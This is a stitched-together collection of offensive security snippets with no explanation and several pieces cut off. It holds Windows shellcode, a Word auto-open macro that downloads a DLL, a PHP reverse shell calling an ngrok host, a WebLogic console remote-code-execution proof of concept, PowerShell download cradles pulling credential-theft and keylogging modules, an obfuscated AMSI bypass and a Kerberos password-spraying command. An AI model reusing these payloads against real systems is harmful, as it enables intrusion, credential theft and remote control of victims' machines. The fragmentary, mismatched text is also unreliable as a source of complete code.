| // ./msfvenom -p windows/exec cmd=calc -f c | |
| // 819 bytes | |
| unsigned char b[] ="\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" | |
| "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" | |
| "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" | |
| "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" | |
| "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" | |
| "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" | |
| "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" | |
| "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" |
| Sub AutoOpen() | |
| Debugging | |
| End Sub | |
| Sub Document_Open() | |
| Debugging | |
| End Sub | |
| Public Function Debugging() As Variant | |
| DownloadDLL |
| #requires -version 2 | |
| <# | |
| Author: Noah | |
| @subTee's reflexive loader | |
| Required Dependencies: msbuild, csc | |
| Execute: Run-UpdateKatz -Verbose |
| <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.ngrok.io/12548 0>&1'");?> |
Unauthenticated Access: <domainname/ip>:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(test)
RCE POC: http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
| // csc.exe empire.cs /reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Management.Automation; | |
| using System.Net; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1'); | |
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Invoke-Inveigh.ps1') | |
| #"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1') | |
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1'); Get-VaultCredential | |
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') |
| #requires -version 2 | |
| <# | |
| PowerSploit File: PowerView.ps1 | |
| Author: Will Schroeder (@harmj0y) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
| $a =[Ref].Assembly.GetType('System.Management.Automation.AmsiUt'+'ils') | |
| $h="4456625220575263174452554847" | |
| $s =[string](0..13|%{[char][int](53+($h).substring(($_*2),2))})-replace " " | |
| $b =$a.GetField($s,'NonPublic,Static') | |
| $b.SetValue($null,$true) |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module: